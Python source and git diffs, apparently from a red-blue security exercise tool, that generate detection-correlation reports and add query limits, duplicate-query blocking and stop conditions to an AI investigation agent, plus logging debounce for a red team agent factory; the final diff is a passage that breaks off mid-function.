            "# Red-Blue Correlation Report",
            "",
            f"**Analysis Time:** {report.analysis_timestamp.strftime('%Y-%m-%d %H:%M:%S UTC')}",
            f"**Red Team Operation:** {report.red_operation_id}",
            f"**Time Window:** {report.time_window_start.strftime('%Y-%m-%d %H:%M')} to {report.time_window_end.strftime('%Y-%m-%d %H:%M')}",
            "",
            "---",
            "",
            "## Executive Summary",
            "",
            "| Metric | Value |",
            "|--------|-------|",
            f"| Red Team Activities | {report.total_red_activities} |",
            f"| Blue Team Detections | {report.total_blue_detections} |",
            f"| Matched (Detected) | {report.matched_activities} |",
            f"| Detection Gaps | {report.undetected_activities} |",
            f"| False Positives | {report.false_positive_detections} |",
            f"| **Detection Rate** | **{report.detection_rate * 100:.1f}%** |",
            f"| False Positive Rate | {report.false_positive_rate * 100:.1f}% |",
            f"| Mean Time to Detect | {mean_ttd} |",
            "",
        ]

        # Detection rate assessment
        if report.detection_rate >= 0.8:
            assessment = "EXCELLENT - Blue team is detecting most red team activities"
        elif report.detection_rate >= 0.6:
            assessment = "GOOD - Majority of activities detected, some gaps remain"
        elif report.detection_rate >= 0.4:
            assessment = "MODERATE - Significant detection gaps exist"
        else:
            assessment = "POOR - Most red team activities went undetected"

        lines.extend([f"### Assessment: {assessment}", "", "---", ""])

        # Technique coverage
        if report.technique_coverage:
            lines.extend(
                [
                    "## Technique Coverage",
                    "",
                    "| Technique | Total | Detected | Missed | Rate |",
                    "|-----------|-------|----------|--------|------|",
                ]
            )
            for tech_id, data in sorted(report.technique_coverage.items()):
                rate = data["detection_rate"]
                if rate >= 0.8:
                    rate_emoji = "✅"
                elif rate >= 0.5:
                    rate_emoji = "⚠️"
                else:
                    rate_emoji = "❌"
                lines.append(
                    f"| {tech_id} | {data['total']} | {data['detected']} | {data['missed']} | {rate_emoji} {rate * 100:.0f}% |"
                )
            lines.extend(["", "---", ""])

        # Successful detections
        if report.matches:
            lines.extend(
                [
                    "## Successful Detections",
                    "",
                    "| Red Activity | Blue Alert | Time Delta | Quality |",
                    "|--------------|------------|------------|---------|",
                ]
            )
            for match in report.matches[:20]:  # Limit to 20
                lines.append(
                    f"| {match.red_activity.technique_id or 'N/A'}: {cell(match.red_activity.action, 40)} | "
                    f"{cell(match.blue_detection.alert_name, 30)} | "
                    f"{match.time_delta_seconds:.0f}s | "
                    f"{match.match_quality} |"
                )
            lines.extend(["", "---", ""])

        # Detection gaps
        if report.gaps:
            lines.extend(
                [
                    "## Detection Gaps (Undetected Activities)",
                    "",
                    "| Technique | Activity | Reason | Recommendation |",
                    "|-----------|----------|--------|----------------|",
                ]
            )
            for gap in report.gaps[:20]:  # Limit to 20
                lines.append(
                    f"| {gap.red_activity.technique_id or 'N/A'} | "
                    f"{cell(gap.red_activity.action, 40)} | "
                    f"{cell(gap.reason, 40)} | "
                    f"{gap.recommended_detection or 'N/A'} |"
                )
            lines.extend(["", "---", ""])

        # False positives
        if report.false_positives:
            lines.extend(
                [
                    "## False Positives (Detections without Red Activity)",
                    "",
                    "| Alert | Technique | Time |",
                    "|-------|-----------|------|",
                ]
            )
            for fp in report.false_positives[:10]:  # Limit to 10
                lines.append(
                    f"| {cell(fp.alert_name, 40)} | {fp.technique_id or 'N/A'} | {fp.timestamp.strftime('%H:%M:%S')} |"
                )
            lines.extend(["", "---", ""])

        # Recommendations
        lines.extend(["## Recommendations", ""])

        if report.gaps:
            # Group recommendations by technique (first recommendation wins)
            recommendations: dict[str, str] = {}
            for gap in report.gaps:
                if gap.recommended_detection:
                    tech = gap.red_activity.technique_id or "General"
                    recommendations.setdefault(tech, gap.recommended_detection)

            for i, (tech, rec) in enumerate(recommendations.items(), 1):
                lines.append(f"{i}. **{tech}**: {rec}")

        if report.detection_rate < 0.8:
            lines.extend(
                [
                    "",
                    "### General Improvements",
                    "- Review query timeout issues in Loki/Grafana",
                    "- Ensure log ingestion latency is < 60 seconds",
                    "- Add missing detection rules for uncovered techniques",
                    "- Consider increasing alert rule evaluation frequency",
                ]
            )

        lines.extend(
            [
                "",
                "---",
                "",
                "*Report generated by Ares Red-Blue Correlation Engine*",
            ]
        )

        return "\n".join(lines)

    def run_full_analysis(self) -> list[CorrelationReport]:
        """Run correlation analysis on all reports in the directory.

        A ``correlation_<operation_id>.md`` file is written to the reports
        directory for every red team operation.

        Returns:
            List of CorrelationReport objects, one per red team operation
        """
        red_reports, blue_detections = self.load_all_reports()

        reports = []
        for operation_id, activities in red_reports:
            report = self.correlate(activities, blue_detections, operation_id)
            reports.append(report)

            # Generate and save markdown report. The operation ID is parsed
            # from report text, so path separators are neutralised to keep the
            # output inside reports_dir; UTF-8 is required for the emoji.
            markdown = self.generate_report_markdown(report)
            safe_operation_id = re.sub(r"[\\/]", "_", operation_id)
            report_path = self.reports_dir / f"correlation_{safe_operation_id}.md"
            report_path.write_text(markdown, encoding="utf-8")
            logger.success(f"Generated correlation report: {report_path}")

        return reports
diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py
index 39022545..bb64d903 100644
--- a/src/ares/core/factories/blue_factory.py
+++ b/src/ares/core/factories/blue_factory.py
@@ -1,84 +1,444 @@
"""Factory for creating investigation agents with presets."""
+import functools
+from typing import Any
+
import dreadnode as dn
from dreadnode.agent import Agent
-from dreadnode.agent.events import AgentStalled, ToolEnd, ToolStart
+from dreadnode.agent.events import AgentEvent, AgentStalled, ToolEnd, ToolStart
from dreadnode.agent.hooks import retry_with_feedback
-from dreadnode.agent.stop import tool_use
+from dreadnode.agent.stop import StopCondition, tool_use
from dreadnode.agent.thread import Thread
from loguru import logger
from ares.core.models import InvestigationState
+from ares.core.query_resilience import QueryResilientExecutor, get_resilient_executor
from ares.core.templates import get_template_loader
from ares.integrations.mitre import MITREAttackClient
from ares.tools.blue import (
CompletionTools,
GrafanaTools,
InvestigationTools,
+ LearningTools,
+ QueryTemplateTools,
QuestionEngineTools,
escalate_investigation,
)
from ares.tools.shared import MITRELookupTools
-# Load system instructions from template
SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja")
-# Track consecutive query calls without workflow progress
-_consecutive_queries = []
+# Track query calls - reset per investigation via reset_query_tracking()
+# Number of query tool calls counted so far (bumped by _increment_query_count).
+_total_queries = 0
+# Names of the most recent query tool calls; trimmed to the last 5 entries.
+_consecutive_queries: list[str] = []
+# Latched to True by _check_query_limit() once the limit has been reached.
+_query_limit_hit = False
+# Query records appended by _record_query().
+_executed_queries: list[dict] = []
+_seen_queries: dict[str, int] = {} # Track query -> count to detect loops
+# Investigation state registered through set_investigation_state().
+_current_state: "InvestigationState | None" = None
+# Default limit, used when the alert severity is not "critical".
+MAX_QUERIES_PER_INVESTIGATION = 5
+MAX_QUERIES_CRITICAL = 8 # Higher limit for critical alerts
+MAX_DUPLICATE_QUERIES = 2 # Max times same query can run before blocking
+
+
+def reset_query_tracking():
+    """Return all module-level query bookkeeping to its initial values.
+
+    Counters, the limit flag, the recorded/seen query containers and the
+    registered investigation state are reset, and
+    ``reset_resilient_executor()`` is called afterwards.
+    """
+    from ares.core.query_resilience import reset_resilient_executor
+
+    global _total_queries, _query_limit_hit, _current_state
+    global _consecutive_queries, _executed_queries, _seen_queries
+
+    # Scalar state.
+    _total_queries, _query_limit_hit, _current_state = 0, False, None
+    # Containers are rebound to fresh objects rather than cleared in place.
+    _consecutive_queries, _executed_queries, _seen_queries = [], [], {}
+
+    reset_resilient_executor()
+
+
+def set_investigation_state(state: "InvestigationState"):
+    """Register ``state`` as the investigation that query tracking refers to.
+
+    The stored reference is read when choosing the query limit and when
+    recording executed queries.
+    """
+    global _current_state
+    _current_state = state
+
+
+def _get_query_limit() -> int:
+    """Return the query budget for the current investigation.
+
+    Returns:
+        MAX_QUERIES_CRITICAL when the registered state's alert has
+        ``labels.severity`` equal to "critical" (case-insensitive), otherwise
+        MAX_QUERIES_PER_INVESTIGATION. The default is also used when no state
+        is registered.
+    """
+    if not _current_state:
+        return MAX_QUERIES_PER_INVESTIGATION
+
+    # Alert payloads can carry explicit nulls ("labels": null,
+    # "severity": null) or non-string values. Calling .get()/.lower() on those
+    # would raise AttributeError, so anything unusable means "not critical".
+    labels = _current_state.alert.get("labels")
+    if not isinstance(labels, dict):
+        return MAX_QUERIES_PER_INVESTIGATION
+
+    severity = labels.get("severity")
+    if isinstance(severity, str) and severity.lower() == "critical":
+        return MAX_QUERIES_CRITICAL
+    return MAX_QUERIES_PER_INVESTIGATION
+
+
+def _check_query_limit() -> str | None:
+    """Tell the caller whether the query budget is exhausted.
+
+    Returns:
+        None while queries are still allowed. Once the limit has been reached
+        (now or on an earlier call) the limit flag is latched and an
+        instruction message for the agent is returned instead.
+    """
+    global _query_limit_hit
+    limit = _get_query_limit()
+
+    still_allowed = not _query_limit_hit and _total_queries < limit
+    if still_allowed:
+        return None
+
+    _query_limit_hit = True
+    message = (
+        f"🛑 QUERY LIMIT REACHED ({_total_queries}/{limit}). You have exceeded the maximum number of queries.\n\n"
+        "You MUST call complete_investigation(summary='...', attack_synopsis='...', recommendations=[...]) NOW.\n\n"
+        "Summarize what you found from previous queries and complete the investigation.\n"
+        "Do NOT attempt any more queries - they will all be blocked.\n\n"
+        "REMEMBER: Include attack_synopsis (narrative of what happened) and recommendations (list of actions).\n\n"
+        "Example:\n"
+        "complete_investigation(\n"
+        " summary='Investigated [alert name]. Found [evidence/no evidence]. Confidence: [level].',\n"
+        " attack_synopsis='At [time], [user/IP] performed [action] against [target]...',\n"
+        " recommendations=['Reset compromised passwords', 'Block source IP', ...]\n"
+        ")"
+    )
+    return message
+
+
+def _check_duplicate_query(query: str) -> str | None:
+    """Count one more run of ``query`` unless it has already hit the repeat cap.
+
+    Queries are compared after stripping surrounding whitespace and
+    lowercasing.
+
+    Returns:
+        None when the query may run (its seen-count is incremented), or a
+        guidance message when it has already run MAX_DUPLICATE_QUERIES times.
+    """
+    key = query.strip().lower()
+    times_seen = _seen_queries.get(key, 0)
+
+    if times_seen < MAX_DUPLICATE_QUERIES:
+        # Still under the cap: remember this run and let it through.
+        _seen_queries[key] = times_seen + 1
+        return None
+
+    logger.warning(f"🔁 Duplicate query blocked (run {times_seen + 1} times): {query[:100]}...")
+    guidance = (
+        f"🔁 DUPLICATE QUERY BLOCKED. You've already run this query {times_seen} times.\n\n"
+        "**DO NOT re-run the same query.** Instead:\n\n"
+        "1. **PARSE THE RESULTS** you already received\n"
+        "2. **EXTRACT IOCs** from the JSON:\n"
+        " - Look for 'computer' field → record as hostname\n"
+        " - Look for 'TargetUserName' in event_data → record as user\n"
+        " - Look for 'IpAddress' in event_data → record as IP\n"
+        "3. **CALL record_evidence()** for each IOC found\n"
+        "4. **Then try a DIFFERENT query** or call complete_investigation()\n\n"
+        "Example extraction from previous results:\n"
+        "```\n"
+        "record_evidence(evidence_type='hostname', value='winterfell.north.sevenkingdoms.local', ...)\n"
+        "record_evidence(evidence_type='user', value='robb.stark', ...)\n"
+        "```"
+    )
+    return guidance
+
+
+def _increment_query_count(tool_name: str):
+    """Count one executed query and log the running total against the limit.
+
+    ``tool_name`` is also appended to the recent-query history; when the
+    history grows past five entries its oldest entry is dropped.
+    """
+    global _total_queries
+    _total_queries = _total_queries + 1
+
+    _consecutive_queries.append(tool_name)
+    if len(_consecutive_queries) > 5:
+        del _consecutive_queries[0]
+
+    budget = _get_query_limit()
+    logger.info(f"📊 Query count: {_total_queries}/{budget}")
+
+
+def _record_query(tool_name: str, kwargs: dict, result_count: int | None = None):
+    """Append a record of one query call to the module log and the active state.
+
+    Args:
+        tool_name: Name of the query tool that was called
+        kwargs: Keyword arguments the tool was called with
+        result_count: Number of results, if known
+    """
+    from datetime import datetime, timezone
+
+    # Prefer the explicit query text; fall back to the whole kwargs repr.
+    query_text = kwargs.get("logql") or kwargs.get("expr") or str(kwargs)
+    recorded_at = datetime.now(timezone.utc).isoformat()
+    datasource = kwargs.get("datasourceUid", "unknown")
+
+    entry = dict(
+        type=tool_name,
+        query=query_text,
+        timestamp=recorded_at,
+        result_count=result_count,
+        datasource=datasource,
+    )
+
+    # The same dict object goes into both lists.
+    _executed_queries.append(entry)
+    if _current_state:
+        _current_state.executed_queries.append(entry)
+
+
+def create_rate_limited_mcp_tool(
+ original_tool: Any, resilient_executor: QueryResilientExecutor | None = None
+) -> Any:
+ """
+ Wrap an MCP tool with rate limiting and resilient execution.
+
+ The wrapper checks the global query counter BEFORE executing.
+ If limit is reached, returns an error message instead of executing.
+ This ensures the LLM sees the limit message even when batching queries.
+
+ Features:
+ - Rate limiting to prevent query abuse
+ - Duplicate query detection
+ - Automatic retry with exponential backoff (via resilient executor)
+ - Automatic time range reduction on timeout
+ """
+ tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "")
+
+ # Only wrap query tools
+ if "query_loki" not in tool_name and "query_prometheus" not in tool_name:
+ return original_tool
+
+ logger.debug(f"Wrapping MCP tool with rate limiting and resilience: {tool_name}")
+
+ # The callable is taken from the tool's `.fn` attribute when present;
+ # otherwise a plain callable is used directly.
+ original_fn = getattr(original_tool, "fn", None)
+ if original_fn is None and callable(original_tool):
+ original_fn = original_tool
+
+ if original_fn is None:
+ logger.warning(f"Could not find callable for tool {tool_name}, not wrapping")
+ return original_tool
+
+ # NOTE(review): the executor is resolved once, at wrap time, while
+ # reset_query_tracking() calls reset_resilient_executor() - confirm the
+ # executor captured here stays valid across investigations.
+ executor = resilient_executor or get_resilient_executor()
+
+ @functools.wraps(original_fn)
+ async def rate_limited_wrapper(*args, **kwargs):
+ # Blocked calls return the message as the tool result and are not counted.
+ error_msg = _check_query_limit()
+ if error_msg:
+ logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached")
+ return error_msg
+
+ # Duplicate detection only applies when the query text is passed as the
+ # `logql` or `expr` keyword argument.
+ query_str = kwargs.get("logql") or kwargs.get("expr") or ""
+ if query_str:
+ dup_msg = _check_duplicate_query(query_str)
+ if dup_msg:
+ logger.warning(f"🔁 Blocking duplicate query: {query_str[:50]}...")
+ return dup_msg
+
+ # Increment counter
+ _increment_query_count(tool_name)
+
+ # Extract time parameters for resilient execution
+ start_time = kwargs.get("startRfc3339") or kwargs.get("start_time") or kwargs.get("start")
+ end_time = kwargs.get("endRfc3339") or kwargs.get("end_time") or kwargs.get("end")
+
+ # If we have time parameters, use resilient executor
+ if start_time and end_time and query_str:
+ logger.info(f"Using resilient executor for {tool_name}")
+ try:
+
+ # Adapter handed to the executor: it writes the query text and time
+ # range it receives back under whichever keyword names the caller
+ # originally used, then calls the original tool function.
+ # presumably the executor may pass a reduced time range - confirm
+ # against QueryResilientExecutor.execute_with_resilience.
+ async def query_wrapper(logql: str, start_time: str, end_time: str, **kw):
+ updated_kwargs = {**kwargs}
+ if "startRfc3339" in kwargs:
+ updated_kwargs["startRfc3339"] = start_time
+ updated_kwargs["endRfc3339"] = end_time
+ elif "start_time" in kwargs:
+ updated_kwargs["start_time"] = start_time
+ updated_kwargs["end_time"] = end_time
+ elif "start" in kwargs:
+ updated_kwargs["start"] = start_time
+ updated_kwargs["end"] = end_time
+ if "logql" in updated_kwargs:
+ updated_kwargs["logql"] = logql
+ elif "expr" in updated_kwargs:
+ updated_kwargs["expr"] = logql
+ return await original_fn(*args, **updated_kwargs)
+
+ result = await executor.execute_with_resilience(
+ query_wrapper,
+ query_str,
+ start_time,
+ end_time,
+ )
+
+ # Record the query with result count
+ # (the caller's original kwargs are recorded, not the adapter's updated ones)
+ result_count = _extract_result_count(result)
+ _record_query(tool_name, kwargs, result_count)
+
+ # Log resilience metadata if present
+ if isinstance(result, dict) and "_resilience_metadata" in result:
+ meta = result["_resilience_metadata"]
+ if meta.get("time_range_reduced"):
+ logger.info(
+ f"Query succeeded with reduced time range "
+ f"({meta.get('time_range_factor', 1.0) * 100:.0f}%)"
+ )
+ if meta.get("retry_count", 0) > 0:
+ logger.info(f"Query succeeded after {meta['retry_count']} retries")
+
+ return result
+
+ except Exception as e:
+ # Failures on the resilient path are returned to the agent as an
+ # error dict instead of being raised.
+ logger.error(f"Resilient execution failed: {e}")
+ _record_query(tool_name, kwargs, result_count=0)
+ return {
+ "status": "error",
+ "error": str(e),
+ "suggestion": "Try a shorter time range or more specific filters.",
+ }
+
+ # Fallback to original execution without resilience (no time params)
+ try:
+ result = await original_fn(*args, **kwargs)
+ result_count = _extract_result_count(result)
+ _record_query(tool_name, kwargs, result_count)
+ return result
+ except Exception as e:
+ error_str = str(e)
+ # Handle gRPC timeout from mcp-grafana (10s default timeout)
+ if "grpc" in error_str.lower() and "connection is closing" in error_str:
+ logger.warning(f"Query tool {tool_name} timed out (mcp-grafana 10s limit)")
+ _record_query(tool_name, kwargs, result_count=0)
+ return {
+ "error": "Query timed out due to mcp-grafana 10s limit. "
+ "Try a shorter time range (e.g., last 1 hour instead of 24 hours) "
+ "or add more specific label filters to reduce the query scope."
+ }
+ # Any other failure on this path is recorded and re-raised.
+ logger.error(f"Query tool {tool_name} failed: {e}")
+ _record_query(tool_name, kwargs, result_count=0)
+ raise
+
+ if hasattr(original_tool, "fn"):
+ # It's a Tool object with a .fn attribute
+ # NOTE(review): this mutates the tool in place; wrapping the same Tool
+ # object a second time would stack wrappers - confirm callers pass
+ # fresh tool objects for each agent.
+ original_tool.fn = rate_limited_wrapper
+ return original_tool
+ # It's a callable, just return the wrapper
+ rate_limited_wrapper.__name__ = tool_name
+ return rate_limited_wrapper
+
+
+def _extract_result_count(result: Any) -> int | None:
+    """Best-effort count of the entries contained in a query tool result.
+
+    Recognised shapes:
+    - list: number of elements
+    - str: number of lines
+    - dict with a "results" key: length of that value (0 when it is null)
+    - dict with "data" -> "result" holding a list of streams: total number of
+      entries across every stream's "values" list
+
+    Returns:
+        The count, or None when the shape is not recognised.
+    """
+    if isinstance(result, list):
+        return len(result)
+    if isinstance(result, str):
+        # splitlines() also counts a last line that has no trailing newline,
+        # so a non-empty single-line response is 1 result rather than 0.
+        return len(result.splitlines())
+    if not isinstance(result, dict):
+        return None
+
+    if "results" in result:
+        results = result["results"]
+        if results is None:
+            # An explicit null means "no results"; len(None) would raise.
+            return 0
+        try:
+            return len(results)
+        except TypeError:
+            # Present but not a sized container: the count is unknown.
+            return None
+
+    data = result.get("data")
+    if isinstance(data, dict):
+        streams = data.get("result")
+        if isinstance(streams, list):
+            total = 0
+            for stream in streams:
+                # Malformed (non-dict) entries are skipped instead of raising
+                # AttributeError on .get().
+                values = stream.get("values") if isinstance(stream, dict) else None
+                if isinstance(values, list):
+                    total += len(values)
+            return total
+    return None
+
+
+def wrap_mcp_query_tools(mcp_tools: list) -> list:
+    """
+    Apply the rate-limiting wrapper to every Loki/Prometheus query tool.
+
+    Args:
+        mcp_tools: List of MCP tools from Grafana MCPClient
+
+    Returns:
+        A new list in the same order, where tools whose name contains
+        "query_loki" or "query_prometheus" have been wrapped and all other
+        tools are passed through unchanged
+    """
+    query_markers = ("query_loki", "query_prometheus")
+    result = []
+    num_wrapped = 0
+
+    for candidate in mcp_tools:
+        label = getattr(candidate, "name", "") or getattr(candidate, "__name__", str(candidate))
+
+        if not any(marker in label for marker in query_markers):
+            # Not a query tool: keep it as-is.
+            result.append(candidate)
+            continue
+
+        result.append(create_rate_limited_mcp_tool(candidate))
+        num_wrapped += 1
+        logger.info(f"✅ Wrapped query tool: {label}")
+
+    logger.info(f"Wrapped {num_wrapped} query tools with rate limiting")
+    return result
async def log_tool_usage(event: ToolStart):
- """Log tool calls for observability and detect loops."""
+ """Log tool calls for observability."""
+ # Note: Query counting is now handled by the rate-limited wrapper (create_rate_limited_mcp_tool)
+ # This hook only handles logging and metrics
+ # Each call is logged and counted in a per-tool "tool_<name>" metric.
if hasattr(event, "tool_call") and event.tool_call:
tool_name = event.tool_call.name
logger.info(f"🔧 Tool call: {tool_name}")
dn.log_metric(f"tool_{tool_name}", 1, mode="count")
- # Track if agent is stuck in query loop
- if "query_loki" in tool_name or "query_prometheus" in tool_name:
- _consecutive_queries.append(tool_name)
- # Keep only last 5 calls
- if len(_consecutive_queries) > 5:
- _consecutive_queries.pop(0)
-
- # If last 3 calls are all queries, warn
- if len(_consecutive_queries) >= 3 and all(
- "query_loki" in t or "query_prometheus" in t for t in _consecutive_queries[-3:]
- ):
- logger.warning(
- "⚠️ DETECTED QUERY LOOP: 3+ consecutive queries without recording evidence"
- )
- logger.warning(
- "Agent should call record_evidence() or get_combined_questions() next"
- )
- elif "record_evidence" in tool_name or "get_combined_questions" in tool_name:
- # Reset counter when workflow tools are called
+ # Clear consecutive queries on completion
+ # (entries are added to _consecutive_queries by _increment_query_count)
+ if "complete_investigation" in tool_name or "escalate_investigation" in tool_name:
_consecutive_queries.clear()
async def log_tool_result(event: ToolEnd):
- """Log tool results."""
+ """Log tool results for observability."""
+ # Note: Query limit enforcement is now handled by the rate-limited wrapper
+ # The wrapper returns an error message BEFORE execution, so the LLM sees it
+ # Failed calls are logged as warnings and counted in the "tool_errors" metric;
+ # successful calls are only logged at info level.
if hasattr(event, "tool_call") and event.tool_call:
+ tool_name = event.tool_call.name
if hasattr(event, "error") and event.error:
- logger.warning(f"❌ Tool {event.tool_call.name} failed: {event.error}")
+ logger.warning(f"❌ Tool {tool_name} failed: {event.error}")
dn.log_metric("tool_errors", 1, mode="count")
else:
- logger.info(f"✅ Tool {event.tool_call.name} completed")
+ logger.info(f"✅ Tool {tool_name} completed")
+# Hook built with retry_with_feedback for AgentStalled events. The feedback text
+# tells the agent to stop querying and call complete_investigation() with all
+# three parameters (summary, attack_synopsis, recommendations).
unstall_hook = retry_with_feedback(
event_type=AgentStalled,
feedback=(
- "You seem stuck. Remember:\n"
- "1. Call get_combined_questions() to get next questions\n"
- "2. Execute queries in PARALLEL to answer those questions\n"
- "3. Record evidence with record_evidence() for EVERY finding\n"
- "4. When done, call complete_investigation() or escalate_investigation()\n\n"
- "If queries return empty results, document that and try broader queries OR move forward."
+ "🛑 YOU ARE STUCK. You MUST call complete_investigation() NOW with ALL parameters.\n\n"
+ "Required parameters:\n"
+ "1. summary: What you found (or 'No malicious activity confirmed' if nothing)\n"
+ "2. attack_synopsis: Narrative of what happened chronologically\n"
+ "3. recommendations: List of actions to take (check alert annotations for 'response' guidance)\n\n"
+ "Example:\n"
+ "complete_investigation(\n"
+ " summary='Investigated DCSync alert. No matching events in time window. Confidence: Low.',\n"
+ " attack_synopsis='Alert triggered at [time] for potential DCSync activity. "
+ "Investigation found no corroborating evidence in Loki logs.',\n"
+ " recommendations=['Continue monitoring for Event 4662', 'Review DC access logs manually']\n"
+ ")\n\n"
+ "DO NOT make more queries. Call complete_investigation() NOW."
),
)
+def max_queries_stop(max_queries: int = 5) -> StopCondition:
+    """Build a stop condition that trips once enough query tool calls have ended.
+
+    A ToolEnd event counts when its tool call name contains "query_loki" or
+    "query_prometheus"; the condition is met when at least ``max_queries``
+    such events are present.
+    """
+    from collections.abc import Sequence
+
+    def _is_query_end(event: AgentEvent) -> bool:
+        """True for a ToolEnd event that belongs to a Loki/Prometheus query tool."""
+        if not isinstance(event, ToolEnd):
+            return False
+        call = getattr(event, "tool_call", None)
+        if not call:
+            return False
+        return "query_loki" in call.name or "query_prometheus" in call.name
+
+    def stop(events: Sequence[AgentEvent]) -> bool:
+        seen = 0
+        for event in events:
+            if _is_query_end(event):
+                seen += 1
+
+        if seen < max_queries:
+            return False
+
+        logger.critical(
+            f"🛑 STOP CONDITION: Max queries ({max_queries}) reached. Forcing stop."
+        )
+        return True
+
+    return StopCondition(stop, name="stop_on_max_queries")
+
+
+def max_tool_calls_stop(max_calls: int = 20) -> StopCondition:
+    """Build a stop condition that trips after ``max_calls`` finished tool calls.
+
+    Every ToolEnd event that carries a tool call is counted, whatever the
+    tool. This is the safety net for an agent that keeps calling non-query
+    tools (record_evidence, get_combined_questions, etc.) without ever calling
+    complete_investigation.
+    """
+    from collections.abc import Sequence
+
+    def stop(events: Sequence[AgentEvent]) -> bool:
+        finished_calls = [
+            event
+            for event in events
+            if isinstance(event, ToolEnd) and getattr(event, "tool_call", None)
+        ]
+        if len(finished_calls) < max_calls:
+            return False
+
+        logger.critical(
+            f"🛑 STOP CONDITION: Max tool calls ({max_calls}) reached without completion. "
+            "Agent must call complete_investigation() or escalate_investigation()."
+        )
+        return True
+
+    return StopCondition(stop, name="stop_on_max_tool_calls")
+
+
def create_investigation_agent(
model: str,
grafana_url: str,
@@ -86,7 +446,7 @@ def create_investigation_agent(
mitre_client: MITREAttackClient,
state: InvestigationState,
grafana_mcp_tools: list | None = None,
- max_steps: int = 150,
+ max_steps: int = 30,
) -> Agent:
"""
Create a configured investigation agent.
@@ -103,6 +463,8 @@ def create_investigation_agent(
Returns:
Configured agent ready to investigate
"""
+ set_investigation_state(state)
+
grafana_tools = GrafanaTools(
base_url=grafana_url,
api_key=grafana_api_key,
@@ -110,6 +472,7 @@ def create_investigation_agent(
investigation_tools = InvestigationTools()
investigation_tools.set_state(state)
+ investigation_tools.set_mitre_client(mitre_client)
question_tools = QuestionEngineTools()
question_tools.set_engines(mitre_client, state)
@@ -120,20 +483,27 @@ def create_investigation_agent(
completion_tools = CompletionTools()
completion_tools.set_state(state)
- # Build tool list
+ loki_url = grafana_url.rstrip("/")
+ query_template_tools = QueryTemplateTools(loki_url=loki_url)
+
+ learning_tools = LearningTools()
+
tools: list = [
grafana_tools,
investigation_tools,
question_tools,
mitre_tools,
completion_tools,
+ query_template_tools,
+ learning_tools,
escalate_investigation,
]
- # Add Grafana MCP tools if available
if grafana_mcp_tools:
logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent")
- tools.extend(grafana_mcp_tools)
+ # Wrap query tools with rate limiting to prevent infinite query loops
+ wrapped_tools = wrap_mcp_query_tools(grafana_mcp_tools)
+ tools.extend(wrapped_tools)
else:
logger.warning(
"No Grafana MCP tools available - agent will have limited query capabilities"
@@ -153,6 +523,8 @@ def create_investigation_agent(
stop_conditions=[
tool_use("complete_investigation"),
tool_use("escalate_investigation"),
+ max_queries_stop(max_queries=5), # Force stop after 5 queries
+ max_tool_calls_stop(max_calls=20), # Force stop after 20 total tool calls
],
thread=Thread(), # type: ignore[call-arg]
)
diff --git a/src/ares/core/factories/red_factory.py b/src/ares/core/factories/red_factory.py
index 483bb3ae..4c2b525c 100644
--- a/src/ares/core/factories/red_factory.py
+++ b/src/ares/core/factories/red_factory.py
@@ -1,5 +1,7 @@
"""Factory for creating red team agents with presets."""
+import time
+
import dreadnode as dn
from dreadnode.agent import Agent
from dreadnode.agent.events import (
@@ -36,37 +38,95 @@
"redteam/agents/system_instructions.md.jinja"
)
+# Event deduplication state
+# Time at which each event type was last logged, keyed by event type name
+# (written by _should_log_event).
+_last_event_times: dict[str, float] = {}
+# Step number most recently logged by log_step_start; None until the first one.
+_last_step_number: int | None = None
+_DEBOUNCE_WINDOW = 0.1 # 100ms debounce window
+
+
+def reset_event_tracking():
+    """Forget all debounce timestamps and the last logged step number.
+
+    Meant to be called before a fresh agent run so earlier runs do not
+    suppress its first log lines.
+    """
+    global _last_event_times, _last_step_number
+    _last_step_number = None
+    # Rebind to a new dict rather than clearing the existing one.
+    _last_event_times = {}
+
+
+def _should_log_event(event_type: str) -> bool:
+    """Decide whether an event of ``event_type`` should be logged now.
+
+    An event is suppressed when the same type was logged less than
+    ``_DEBOUNCE_WINDOW`` seconds ago; otherwise the current time is remembered
+    for that type and the event is allowed.
+
+    Returns:
+        True if the caller should log the event, False if it is a rapid duplicate.
+    """
+    # Intervals are measured on the monotonic clock: time.time() follows the
+    # wall clock, which can jump (NTP or manual adjustment) and would then
+    # wrongly suppress or release events.
+    now = time.monotonic()
+    last_time = _last_event_times.get(event_type)
+    # "Never logged" is tracked explicitly instead of using 0 as a sentinel,
+    # because a monotonic reading has no defined relation to zero.
+    if last_time is not None and now - last_time < _DEBOUNCE_WINDOW:
+        return False
+    _last_event_times[event_type] = now
+    return True
+
async def log_step_start(event: StepStart):
- """Log step start for debugging."""
- logger.info(f"📍 Step started: step_number={getattr(event, 'step_number', '?')}")
+ """Log step start for debugging - only when step number is meaningful."""
+ # _last_step_number remembers the step most recently logged by this hook.
+ global _last_step_number
+ step_num = getattr(event, "step_number", None)
+
+ # Skip if no real step number or if it's the same as last logged step
+ if step_num is None or step_num == _last_step_number:
+ return
+
+ # Rapid repeats are additionally suppressed by the shared debounce check.
+ if not _should_log_event("step_start"):
+ return
+
+ _last_step_number = step_num
+ logger.info(f"📍 Step {step_num} started")
async def log_generation_end(event: GenerationEnd):
- """Log generation end with details."""
- logger.info("📍 Generation ended")
- # Log the message if available
- if hasattr(event, "message") and event.message:
- msg = event.message
- logger.info(f"📍 Message type: {type(msg).__name__}")
- if hasattr(msg, "content"):
- logger.info(f"📍 Message content (first 500 chars): {str(msg.content)[:500]}")
- if hasattr(msg, "tool_calls") and msg.tool_calls:
- logger.info(f"📍 Tool calls requested: {[tc.name for tc in msg.tool_calls]}")
+ """Log generation end - only when there's meaningful content."""
+ # Skip empty/spurious generation events
+ if not hasattr(event, "message") or not event.message:
+ return
+
+ msg = event.message
+ # Content counts only when it is non-empty after stripping whitespace.
+ has_content = hasattr(msg, "content") and msg.content and str(msg.content).strip()
+ has_tool_calls = hasattr(msg, "tool_calls") and msg.tool_calls
+
+ # Only log if there's actual content or tool calls
+ if not has_content and not has_tool_calls:
+ return
+
+ if not _should_log_event("generation_end"):
+ return
+
+ # Log concise summary
+ # Tool calls take precedence: when both are present only the tool names are logged.
+ if has_tool_calls:
+ tool_names = [tc.name for tc in msg.tool_calls]
+ logger.info(f"🤖 Agent requesting tools: {tool_names}")
+ elif has_content:
+ # NOTE(review): "..." is appended even when the content is shorter than
+ # 200 characters - confirm this is intended.
